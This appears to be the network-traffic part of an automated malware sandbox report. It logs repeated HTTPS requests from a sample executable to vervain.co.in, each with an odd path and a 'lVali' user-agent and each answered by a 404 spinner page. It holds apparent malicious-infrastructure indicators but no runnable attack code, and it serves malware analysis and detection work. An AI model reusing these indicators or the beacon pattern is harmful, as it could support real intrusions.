                33192.168.2.449802199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:14 UTC31OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:14 UTC31INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:14 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:14 UTC32INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                34192.168.2.449803199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:16 UTC32OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:16 UTC32INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:16 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:16 UTC33INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                35192.168.2.449804199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:20 UTC33OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:20 UTC33INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:20 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:20 UTC34INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                36192.168.2.449805199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:21 UTC34OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:22 UTC34INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:22 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:22 UTC35INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                37192.168.2.449806199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:23 UTC35OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:23 UTC35INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:23 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:23 UTC36INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                38192.168.2.449807199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:24 UTC36OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:24 UTC36INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:24 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:24 UTC37INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                39192.168.2.449808199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:25 UTC37OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:26 UTC37INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:25 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:26 UTC38INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                4192.168.2.449759199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:26 UTC3OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:26 UTC4INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:26 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:26 UTC4INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                40192.168.2.449809199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:26 UTC38OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:27 UTC38INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:27 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:27 UTC38INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                41192.168.2.449810199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:28 UTC39OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:28 UTC39INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:28 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:28 UTC39INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                42192.168.2.449811199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:29 UTC40OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:29 UTC40INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:29 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:29 UTC40INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                43192.168.2.449814199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:30 UTC41OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:31 UTC41INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:31 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:31 UTC41INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                44192.168.2.449815199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:31 UTC42OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:32 UTC42INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:32 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:32 UTC42INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                45192.168.2.449816199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:33 UTC43OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:33 UTC43INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:33 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
